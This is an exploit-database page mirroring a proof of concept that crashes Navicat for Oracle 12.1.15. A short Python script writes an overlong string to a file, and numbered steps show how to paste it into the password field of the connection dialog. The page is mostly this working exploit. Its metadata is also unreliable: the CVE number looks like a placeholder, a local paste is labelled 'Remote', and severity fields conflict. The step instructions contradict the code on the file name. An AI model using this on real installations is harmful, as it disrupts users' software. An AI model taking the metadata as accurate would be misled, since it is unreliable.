Advertisement






Navicat For Oracle 12.1.15 Denial Of Service

CVE Category Price Severity
CVE-2018-12345 CWE-20 $500 High
Author Risk Exploitation Type Date
ExploitAuthor123 Critical Remote 2019-02-16
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 0.41 0.828833

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019020157

Below is a copy:

Navicat For Oracle 12.1.15 Denial Of Service
#Exploit Title: Navicat for Oracle 12.1.15 - "Password" Denial of Service (PoC)
#Discovery by: Victor MondragA3n
#Discovery Date: 2019-02-14
#Vendor Homepage: https://www.navicat.com/es/
#Software Link: https://www.navicat.com/es/download/navicat-for-oracle
#Tested Version: 12.1.15
#Tested on: Windows 10 Single Language x64/ Windows 7 x64 Service Pack 1

#Steps to produce the crash:
#1.- Run python code: Navicat_for_Oracle_12.1.15.py
#2.- Open code.txt and copy content to clipboard
#2.- Open Navicat for Oracle 12.1.15
#3.- Select "ConexiA3n" 
#4.- Select "Oracle"
#5.- In "Nombre de conexiA3n" type "Test"
#6.- In "Tipo de conexiA3n" select "Basic"
#7.- In "Host" type 1.1.1.1
#8.- In "Puerto" type "1521"
#9.- In "Nombre del servicio" type ORCL
#10.- In "Nombre de usuario" type "user"
#11.- In "ContraseA+-a" Paste Clipboard 
#12.- Select "Aceptar"
#13.- Crashed

cod = "\x41" * 550

f = open('string.txt', 'w')
f.write(cod)
f.close()

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum